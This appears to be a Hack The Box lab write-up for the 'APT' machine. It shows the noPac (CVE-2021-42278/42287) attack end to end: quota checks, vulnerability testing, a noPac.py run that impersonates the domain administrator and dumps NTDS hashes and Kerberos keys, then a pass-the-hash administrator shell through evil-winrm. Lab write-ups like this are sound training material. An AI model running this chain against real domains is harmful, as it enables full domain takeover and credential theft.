CVE-2021-42278/ CVE-2021-42287
The target system is likely vulnerable to the CVE-2021-42278 +CVE-2021-42287 chain attack given the fact it is relatively older and doesn’t seem to have patch installed for it
By default, any domain user has the SeMachineAccountPrivilege enabled and I have already confirmed that the henry.vinson_adm user has the privileges enabled
Additionally, users with the privilege can add up to 10 devices to the domain. This can be checked both locally and remotely
*evil-winrm* ps c:\Users\henry.vinson_adm\Documents> Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota
distinguishedname : DC=htb,DC=local
ms-ds-machineaccountquota : 999
name : htb
objectclass : domainDNS
objectguid : f21d468d-12d5-4130-83ce-76336296ff48For some reason, the ms-DS-MachineAccountQuota attribute set to 999. It’s usually 10 by default
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache powerview 'htb.local/@apt.htb.local' -k --no-pass --dc-ip $IPv6 -q 'Get-DomainObject "DC=HTB,DC=LOCAL" -ResolveGUIDs'
[2023-10-23 19:42:51] LDAP Signing NOT Enforced!
[...REDACTED...]
ms-ds-machineaccountquota : 999
[...REDACTED...]It can also be checked remotely. I used the TGT of the henry.vinson user this time to show that the exploit does not require elevating privileges to the henry.vinson_adm user
this would usually be done via ldapsearch but i only have the tgt and ntlm hash of the henry.vinson user, therefore i opted out to using the python implementation of powerview
exploit (nopac)
The CVE-2021-42278 + CVE-2021-42287 chain attack (noPac) works by impersonating a domain controller through faking a computer account with the trailing $ sign
Testing
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ crackmapexec smb apt.htb.local -d htb.local -u henry.vinson -h 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -M nopac
smb apt.htb.local 445 apt [*] windows server 2016 standard 14393 x64 (name:APT) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
smb apt.htb.local 445 apt [+] htb.local\henry.vinson:e53d87d42adaa3ca32bdb34a876cbffb
NOPAC apt.htb.local 445 APT TGT with PAC size 1362
NOPAC apt.htb.local 445 APT TGT without PAC size 613
NOPAC apt.htb.local 445 APT
NOPAC apt.htb.local 445 APT VULNEABLE
nopac apt.htb.local 445 apt next step: https://github.com/Ridter/noPaccrackmapexec has a module available to test for the nopac exploit above As the result shown above, the target system is confirmed to be vulnerable
Exploitation
┌──(kali㉿kali)-[~/…/htb/labs/apt/noPac]
└─$ KRB5CCNAME=../smb/hashdump/henry.vinson@apt.htb.local.ccache python3 noPac.py htb.local/henry.vinson@apt.htb.local -no-pass -k -dc-host apt -dc-ip $IPv6 --impersonate administrator -dump
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
[*] Current ms-DS-MachineAccountQuota = 999
[*] Selected Target APT.htb.local
[*] will try to impersonate administrator
[*] Adding Computer Account "WIN-AHV3WFOKV6D$"
[*] MachineAccount "WIN-AHV3WFOKV6D$" password = IojC$7fx8*&u
[*] Successfully added machine account WIN-AHV3WFOKV6D$ with password IojC$7fx8*&u.
[*] WIN-AHV3WFOKV6D$ object = CN=WIN-AHV3WFOKV6D,CN=Computers,DC=htb,DC=local
[*] WIN-AHV3WFOKV6D$ sAMAccountName == APT
[*] Saving a DC's ticket in APT.ccache
[*] Reseting the machine account to WIN-AHV3WFOKV6D$
[*] Restored WIN-AHV3WFOKV6D$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Saving a user's ticket in administrator.ccache
[*] Rename ccache to administrator_APT.htb.local.ccache
[*] Attempting to del a computer with the name: WIN-AHV3WFOKV6D$
[-] Delete computer WIN-AHV3WFOKV6D$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x549bec76bf3424e0dd358da484de7268
[-] SAM hashes extraction failed: SMB SessionError: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)
[-] LSA hashes extraction failed: SMB SessionError: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:738f00ed06dc528fd7ebb7a010e50849:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb:::
henry.vinson_adm:1106:aad3b435b51404eeaad3b435b51404ee:4cd0db9103ee1cf87834760a34856fef:::
APT$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798:::
WIN-AHV3WFOKV6D$:5602:aad3b435b51404eeaad3b435b51404ee:265efdaf00baf55bf25ee267e93d6f70:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3
Administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413
Administrator:des-cbc-md5:0816d9d052239b8a
krbtgt:aes256-cts-hmac-sha1-96:b63635342a6d3dce76fcbca203f92da46be6cdd99c67eb233d0aaaaaa40914bb
krbtgt:aes128-cts-hmac-sha1-96:7735d98abc187848119416e08936799b
krbtgt:des-cbc-md5:f8c26238c2d976bf
henry.vinson:aes256-cts-hmac-sha1-96:63b23a7fd3df2f0add1e62ef85ea4c6c8dc79bb8d6a430ab3a1ef6994d1a99e2
henry.vinson:aes128-cts-hmac-sha1-96:0a55e9f5b1f7f28aef9b7792124af9af
henry.vinson:des-cbc-md5:73b6f71cae264fad
henry.vinson_adm:aes256-cts-hmac-sha1-96:f2299c6484e5af8e8c81777eaece865d54a499a2446ba2792c1089407425c3f4
henry.vinson_adm:aes128-cts-hmac-sha1-96:3d70c66c8a8635bdf70edf2f6062165b
henry.vinson_adm:des-cbc-md5:5df8682c8c07a179
APT$:aes256-cts-hmac-sha1-96:4c318c89595e1e3f2c608f3df56a091ecedc220be7b263f7269c412325930454
APT$:aes128-cts-hmac-sha1-96:bf1c1795c63ab278384f2ee1169872d9
APT$:des-cbc-md5:76c45245f104a4bf
WIN-AHV3WFOKV6D$:aes256-cts-hmac-sha1-96:bf094ce831f62ec70e126462cc7e0e0dd5cdeef55a072ecf5f32c044668b4206
WIN-AHV3WFOKV6D$:aes128-cts-hmac-sha1-96:9fa9d90f862474560bab1dd36d71e8bd
WIN-AHV3WFOKV6D$:des-cbc-md5:702a0dc23264c116
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...
[*] Stopping service RemoteRegistryDomain Level Compromise
Shell Drop
The built-in -shell flag is not available due to the C$ share not being present
Opting out to evil-winrm
┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ evil-winrm -i apt.htb.local -u administrator -H 'c370bddf384a691d811ff3495e8a72e2'
Evil-WinRM shell v3.5
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\Administrator\Documents> whoami
htb\administrator
*evil-winrm* ps c:\Users\Administrator\Documents> hostname
apt
*evil-winrm* ps c:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
ethernet adapter ethernet:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::240
ipv6 address. . . . . . . . . . . : dead:beef::44d8:93c7:dd88:c522
ipv6 address. . . . . . . . . . . : dead:beef::b885:d62a:d679:573f
link-local ipv6 address . . . . . : fe80::44d8:93c7:dd88:c522%5
ipv4 address. . . . . . . . . . . : 10.10.10.213
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : dead:beef::1
fe80::250:56ff:feb9:d784%5
10.10.10.2System Level Compromise